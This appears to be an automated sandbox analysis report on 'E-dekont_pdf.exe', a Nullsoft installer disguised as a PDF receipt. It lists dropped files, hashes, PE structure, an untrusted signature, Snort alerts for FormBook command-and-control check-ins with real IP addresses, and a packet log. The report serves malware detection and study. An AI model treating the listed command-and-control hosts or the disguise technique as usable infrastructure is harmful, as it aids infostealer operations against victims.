                                                                                            Process:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):284154
                                                                                            Entropy (8bit):7.042067425538967
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:303wrj2YdahEa3hcWhlC9Q3Zo1lZPu/yGQn9P3:30aCFeyloQ3K1rPqZQl3
                                                                                            MD5:CC78AC5159834884720C6ED4BC140366
                                                                                            SHA1:37F6DCFAD412D108E013C30118A6694E42B51593
                                                                                            SHA-256:7DF755DC4F39DCBB6B3314EF2E8DE349056D5E1B74EC3B9D06ED67356D1AD59E
                                                                                            SHA-512:06B125BFA67D902EB56DB2DE5DA12FA50D7603BF800CA5DE6481C93BDC52CBEB914FA5B03B4481A39F55FB2D7AAF2B23AEE60DD03A4317D1A0E336991D1D378A
                                                                                            Malicious:false
                                                                                            Preview:................bb..tt.................+........]]...........JJ..E..................\\\...|.....!......................uuu.."""".............................yy.......c.......5..................=...........```.......5......5.EE..33.......G..ddd..#.........<.d. ..........................R.UU..=..........[[[....B......................D...S.............<<....MM...................................TTTTTT..........##..................--.....................................KKKK.....''.........YY............i.....iii............"..OO.`.T.......................h...............YYYY..XX....+++.... .......i...EEE.###......................vvvvvv.====............b.......................;....[[[[..UU.`..=...M...........G...3.................|||...........-.XXXXX...ll........ddd..NN...........``........../.......................................!!.%%........w...............q...........a................yy.WWW..........1..................../.........k......................f.{......UUUU............7........

                                                                                            C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns\Recessionary31\Urbanologist\ThrottleGearXMLHelper.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):136424
                                                                                            Entropy (8bit):5.786246417289715
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:Z/mdOy2vXK4TLYf1wQ5okJf6HnkQFIKwCYQI+1XA/nZia:hTLhwoVnrIDCYQIu
                                                                                            MD5:0F7E0D919E4169A410F3A8FFC00C6AF2
                                                                                            SHA1:162F2EAC113F0EED823C166DA4A49017F2469537
                                                                                            SHA-256:1D52E6CE1C3FF7E824285B01BF112DBC3E4C5494FA63E971EB262C990A78344C
                                                                                            SHA-512:34BC8835A71976123709B72A8BDCC932302B5ED0CEA4BC5D62E388F13E624529771A495F604CFC3EF1EB167C36F436F7A2D63CDB9D3921D3B52ED6B8B5B83C32
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....5;a.........." ..0.................. ........... .......................@......".....`...@......@............... ............................... ............................................................................................... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@........................................H.......p................................................................0...........~.........,.~.....8....~.......... .... ....(............,X..r...p.o................,,...rC..p~....o...............,...o...............,...o...........,..o.........&....~.....+..*.(....K.;.........3.d........."..........0...........~.........,.~.....8....~.......... .... ....(............,X..re..p.o................,,...r...p~....o...............,...o...............,...o...........,..o.........&....~.

                                                                                            C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns\Underbelysningens\Gennemsnitsfiltrerings\Menneskelivets\unthreatened\Plutoniumets151.Sta

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):168276
                                                                                            Entropy (8bit):4.596335304718325
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:A7fSsUgrLyWDpaDBmlayD7cRBn7Sn953tFIk:D3Me6ayD7QBn7Sn953tFIk
                                                                                            MD5:65F7AA097ACC60ECE83A481FC7736FCE
                                                                                            SHA1:F7AE40C685574FA5095AD7F0DFE6467579A25B73
                                                                                            SHA-256:F0C3F9B378AAEBF798EA05224E23A656530C855C78728FAD2537845D4CBF8438
                                                                                            SHA-512:996B166E229D922651DB76F985D477C60ABF79BBBC589D72C82D8168505B4D1C1765351B8C9E0A41B6EC9B7E5659139169258A3E64B75713B675F09A2B337900
                                                                                            Malicious:false
                                                                                            Preview:..........vvv.R........S......x......l.7.........llll......FFF.....MM...........D.^.o....i....FFF................................zzzz...u.................f........................................................YYY........................+........a.k........eeee.............DD...................Y........qq..lllll....................@@@..........+...VVV..................OO.........VV.........)............8........===......OOO..|...............s..w...............................................Y.....................=..EE.(.....__.(.nn.....xxxxx.......[[[[.9.......>...B................GGG..d...?............................R.....--.....]]]].................................TT......YYYY...YY......8............!....QQ...<<<<<<.......%%%.........iii.....................j.......C........{{.q.*...........:.......)..............3..q....M.p.........^................_....""".`...................O.P.......................aaaa............77....TTTT...........hhh..iiiiii..........tt.CC.c......=.......

                                                                                            C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns\battery-level-40-symbolic.svg

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                            Category:dropped
                                                                                            Size (bytes):860
                                                                                            Entropy (8bit):5.132095225843424
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:t4CQl+twqVkcqy5BrpayyKbRAecFhBrNxrGDT/M:VwkkqvayNtAecFZwDT/M
                                                                                            MD5:F666378DA2379BCAB07821BA10BA619A
                                                                                            SHA1:3502843000283C3FF0174275CBAC296C7426EE73
                                                                                            SHA-256:1A89FF0A5A2B0A434C767ED37E18403AC5037F602CB61EEE21630BCF9CF12B31
                                                                                            SHA-512:6134BD5E60A968EFE48D9C4F11C552F91113F0D458424D3BE3A2E711875049A077895EC5B0FE462C0E15F21919D9F65CA716F20CEF61A7282EC61C2FB77666F4
                                                                                            Malicious:false
                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16.001"><g fill="#2e3436"><path d="M5 10v3h6v-3z"/><path d="M5.469 0c-.49 0-.796.216-1.032.456C4.202.696 4 1.012 4 1.486V2H2v14h12V2h-2v-.406l-.002-.028a1.616 1.616 0 00-.416-1.012c-.236-.278-.62-.584-1.2-.552L10.439 0zM6 2h4v2h2v10H4V4h2z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:normal;shape-padding:0;isolation:auto;mix-blend-mode:normal;solid-color:#000;solid-opacity:1;marker:none" color="#bebebe" font-weight="400" font-family="sans-serif" overflow="visible"/></g></svg>

                                                                                            C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns\face-monkey-symbolic.svg

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                            Category:dropped
                                                                                            Size (bytes):1346
                                                                                            Entropy (8bit):4.281846847063057
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:t4Cpengy02S4S3mIrp+ex1v2dzkdC0zQl1N1dC0zQl1Ns+lF6hUFpbPUx9u1QJof:XX2Y3m2+Tdzk40M1L40M1iy6hUFpLUSb
                                                                                            MD5:744F5B5C9C53C61E28090465EE40D555
                                                                                            SHA1:CBA071FB4BE3F3C3D9FC7399740B6A666FED290B
                                                                                            SHA-256:234D5043B2791B126C6CFCA7BB2F5808EBBD46050EB1DC0F85D309E14D16290D
                                                                                            SHA-512:A3469E33202DD3E7042BCE8EF07C84D91993C8ABAB22EE3D989030BDFB40FD9301351B1FC43B4BEFDFA958018D8A5D2161D36B5B0C6F55C2E55C26FF2EBA3D5F
                                                                                            Malicious:false
                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M7.844.031C6.617.765 6.78 1.664 6.938 2.062c-1.808.269-3.55 1.312-4.125 3.188-.284-.212-.588-.344-.938-.344C.841 4.906 0 5.99 0 7.281c0 1.293.841 2.344 1.875 2.344.467 0 .886-.212 1.219-.563 2.719-1.273 7.092-1.466 9.875.032.32.322.71.531 1.156.531C15.159 9.625 16 8.574 16 7.281c0-1.292-.841-2.375-1.875-2.375-.428 0-.811.193-1.125.5-.507-1.702-1.84-2.91-3.812-3.281-.17-.639-.285-1.916 1.625-1.781-2.17-.793-2.72 1.625-2.72 1.625-.265-.118-.965-.639-.25-1.938zM6.469 5.063c.38 0 .719.646.719 1.468 0 .823-.34 1.5-.72 1.5-.38 0-.655-.677-.655-1.5 0-.822.276-1.468.656-1.468zm3 0c.38 0 .719.646.719 1.468 0 .823-.34 1.5-.72 1.5-.38 0-.655-.677-.655-1.5 0-.822.276-1.468.656-1.468zM2 5.968c.256 0 .474.15.656.343a6.09 6.09 0 00.125 1.75c-.191.294-.452.5-.781.5-.572 0-1.031-.566-1.031-1.28 0-.715.46-1.313 1.031-1.313zm12.031 0c.572 0 1.063.597 1.063 1.312 0 .715-.49 1.282-1.063 1.282-.372 0-.659-.262-.843-.62

                                                                                            C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns\image-x-generic-symbolic.svg

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                            Category:dropped
                                                                                            Size (bytes):1761
                                                                                            Entropy (8bit):5.053589855865684
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:t4CBGMR9kyKbRAecFxVwfY1wh/iMEggwz7CoSlENOc710EctiEyKbRAecFxVK:gM8NtAecFEA1s/R7Ul2JazvNtAecFe
                                                                                            MD5:1512B3C203BBF81DB84D42173CEE0E2E
                                                                                            SHA1:18A6B15220AA8915C41AAA77CA9FF35174C3061D
                                                                                            SHA-256:406B237C7B1AB841E052D079D571470AD78637A4B01538D5D636115B820EF768
                                                                                            SHA-512:5122EA76055D8B64170DB4B9DE382B04E78F09F809FF7392BBE9F08D3D6AE8C53C05CEBFFBB5BEF9DDF8D89AEEFD32BD0B74474E083C11417E42DFE4E3F9024E
                                                                                            Malicious:false
                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" overflow="visible"/><path d="M9.536 8.3c-.467-.065-1.046-.105-1.532.275-.403.315-.777.713-1.105 1.017-.328.305-.652.44-.586.44H2.47v1h3.844c.582 0 .9-.368 1.264-.705.364-.337.731-.721 1.043-.965.106-.083.406-.124.779-.072.373.051.707.18 1.102.18.146 0 .215.034.324.126.108.092.23.254.365.448.135.193.28.417.498.62.218.204.546.383.922.383h.86v-1h-.86c-.1 0-.14-.02-.238-.113-.099-.092-.22-.26-.

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.954772327269464
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:E-dekont_pdf.exe
                                                                                            File size:404480
                                                                                            MD5:774ef0fcf3f7b089b008f54a5fafc6fd
                                                                                            SHA1:bf79dd20705db222b4dfb303529d27f633618014
                                                                                            SHA256:e044ecf0f485711cc6e4e8bbd56819838787b2365893783b3794a969ce2b5aeb
                                                                                            SHA512:82b660fda71d8b454db82db181bfb100fc7b370e59ae3a48cf21dce31ea4ce5a90a955e035c6e400e796d98bc186b2226658d76984dbc577c4abedf894412e71
                                                                                            SSDEEP:12288:6T5j5/PO2px6KzTwgBx2Sz3B1JlK0UryTBQ:6T5j5/m2pEKzTwgaSz3B17VQ
                                                                                            TLSH:BD84230676B5D02FE1A197302EB9FA5D6EF3911026B0425713216BB83F2E752AC0E7D3
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h.......@.

                                                                                            File Icon

                                                                                            Icon Hash:b2a88c96b2ca6a72

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x403640
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x614F9D02 [Sat Sep 25 22:04:50 2021 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:61259b55b8912888e90f516ca08dc514

                                                                                            Authenticode Signature

                                                                                            Signature Valid:false
                                                                                            Signature Issuer:E=Ubrydelig@Asaphus.Fac, OU="Indsnvres Vamping Fractionate ", O=Standardvrdier, L=Pessac, S=Nouvelle-Aquitaine, C=FR
                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                            Error Number:-2146762487
                                                                                            Not Before, Not After
                                                                                            • 28/06/2022 00:15:38 27/06/2025 00:15:38
                                                                                            Subject Chain
                                                                                            • E=Ubrydelig@Asaphus.Fac, OU="Indsnvres Vamping Fractionate ", O=Standardvrdier, L=Pessac, S=Nouvelle-Aquitaine, C=FR
                                                                                            Version:3
                                                                                            Thumbprint MD5:DFFA99491A597E0ADAD7A6EB01F36B97
                                                                                            Thumbprint SHA-1:0A1B71246CF216003E32A79D63A75CD0E919EE4C
                                                                                            Thumbprint SHA-256:9A326616450AED8D3BCEEE07B2F079BB39695A5D19B8E59E65CF37B5B6C807FB
                                                                                            Serial:67B2E2FBFD0455165334569FF96CA31A3464E5A5

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 000003F4h
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000020h
                                                                                            pop edi
                                                                                            xor ebx, ebx
                                                                                            push 00008001h
                                                                                            mov dword ptr [ebp-14h], ebx
                                                                                            mov dword ptr [ebp-04h], 0040A230h
                                                                                            mov dword ptr [ebp-10h], ebx
                                                                                            call dword ptr [004080C8h]
                                                                                            mov esi, dword ptr [004080CCh]
                                                                                            lea eax, dword ptr [ebp-00000140h]
                                                                                            push eax
                                                                                            mov dword ptr [ebp-0000012Ch], ebx
                                                                                            mov dword ptr [ebp-2Ch], ebx
                                                                                            mov dword ptr [ebp-28h], ebx
                                                                                            mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                            call esi
                                                                                            test eax, eax
                                                                                            jne 00007F83DCBE202Ah
                                                                                            lea eax, dword ptr [ebp-00000140h]
                                                                                            mov dword ptr [ebp-00000140h], 00000114h
                                                                                            push eax
                                                                                            call esi
                                                                                            mov ax, word ptr [ebp-0000012Ch]
                                                                                            mov ecx, dword ptr [ebp-00000112h]
                                                                                            sub ax, 00000053h
                                                                                            add ecx, FFFFFFD0h
                                                                                            neg ax
                                                                                            sbb eax, eax
                                                                                            mov byte ptr [ebp-26h], 00000004h
                                                                                            not eax
                                                                                            and eax, ecx
                                                                                            mov word ptr [ebp-2Ch], ax
                                                                                            cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                            jnc 00007F83DCBE1FFAh
                                                                                            and word ptr [ebp-00000132h], 0000h
                                                                                            mov eax, dword ptr [ebp-00000134h]
                                                                                            movzx ecx, byte ptr [ebp-00000138h]
                                                                                            mov dword ptr [00470318h], eax
                                                                                            xor eax, eax
                                                                                            mov ah, byte ptr [ebp-0000013Ch]
                                                                                            movzx eax, ax
                                                                                            or eax, ecx
                                                                                            xor ecx, ecx
                                                                                            mov ch, byte ptr [ebp-2Ch]
                                                                                            movzx ecx, cx
                                                                                            shl eax, 10h
                                                                                            or eax, ecx

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1710000xa50.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x60e980x1d68.data
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x66760x6800False0.6570763221153846data6.415810447422783IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xa0000x663780x600False0.5091145833333334data4.106448979512574IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x710000x1000000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x1710000xa500xc00False0.4020182291666667data4.186639420254752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_ICON0x1711900x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                                                            RT_DIALOG0x1714780x100dataEnglishUnited States
                                                                                            RT_DIALOG0x1715780x11cdataEnglishUnited States
                                                                                            RT_DIALOG0x1716980x60dataEnglishUnited States
                                                                                            RT_GROUP_ICON0x1716f80x14dataEnglishUnited States
                                                                                            RT_MANIFEST0x1717100x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                                            Imports

                                                                                            DLLImport
                                                                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            192.168.11.20185.53.179.9049880802031412 04/17/23-09:04:06.968166TCP2031412ET TROJAN FormBook CnC Checkin (GET)4988080192.168.11.20185.53.179.90
                                                                                            192.168.11.20188.114.96.349867802031449 04/17/23-09:00:59.237935TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986780192.168.11.20188.114.96.3
                                                                                            192.168.11.20185.53.179.9049861802031412 04/17/23-08:59:15.628217TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986180192.168.11.20185.53.179.90
                                                                                            192.168.11.20185.53.179.9049880802031453 04/17/23-09:04:06.968166TCP2031453ET TROJAN FormBook CnC Checkin (GET)4988080192.168.11.20185.53.179.90
                                                                                            192.168.11.20185.53.179.9049880802031449 04/17/23-09:04:06.968166TCP2031449ET TROJAN FormBook CnC Checkin (GET)4988080192.168.11.20185.53.179.90
                                                                                            192.168.11.20188.114.96.349867802031453 04/17/23-09:00:59.237935TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986780192.168.11.20188.114.96.3
                                                                                            192.168.11.20188.114.96.349867802031412 04/17/23-09:00:59.237935TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986780192.168.11.20188.114.96.3
                                                                                            192.168.11.20185.53.179.9049861802031449 04/17/23-08:59:15.628217TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986180192.168.11.20185.53.179.90
                                                                                            192.168.11.2023.227.38.7449883802031453 04/17/23-09:05:05.047703TCP2031453ET TROJAN FormBook CnC Checkin (GET)4988380192.168.11.2023.227.38.74
                                                                                            192.168.11.20185.53.179.9049861802031453 04/17/23-08:59:15.628217TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986180192.168.11.20185.53.179.90
                                                                                            192.168.11.2023.227.38.7449883802031449 04/17/23-09:05:05.047703TCP2031449ET TROJAN FormBook CnC Checkin (GET)4988380192.168.11.2023.227.38.74
                                                                                            192.168.11.2023.227.38.7449883802031412 04/17/23-09:05:05.047703TCP2031412ET TROJAN FormBook CnC Checkin (GET)4988380192.168.11.2023.227.38.74
                                                                                            192.168.11.2034.138.169.849851802018752 04/17/23-08:57:45.684694TCP2018752ET TROJAN Generic .bin download from Dotted Quad4985180192.168.11.2034.138.169.8

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Apr 17, 2023 08:57:45.521406889 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:45.684103966 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.684225082 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:45.684694052 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:45.846635103 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847227097 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847271919 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847342968 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847414970 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:45.847429991 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847441912 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847454071 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847465992 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847477913 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847490072 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847495079 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:45.847501993 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:45.847646952 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.009516954 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009624004 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009660959 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009670019 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.009675980 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009749889 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.009749889 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.009761095 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009788036 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009797096 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.009799004 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009809971 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009821892 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009831905 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009843111 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009855032 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009874105 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009886980 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009896040 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.009896040 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.009896040 CEST4985180192.168.11.2034.138.169.8
                                                                                            Apr 17, 2023 08:57:46.009897947 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009907961 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009918928 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009929895 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009939909 CEST804985134.138.169.8192.168.11.20
                                                                                            Apr 17, 2023 08:57:46.009944916 CEST4985180192.168.11.2034.138.169.8
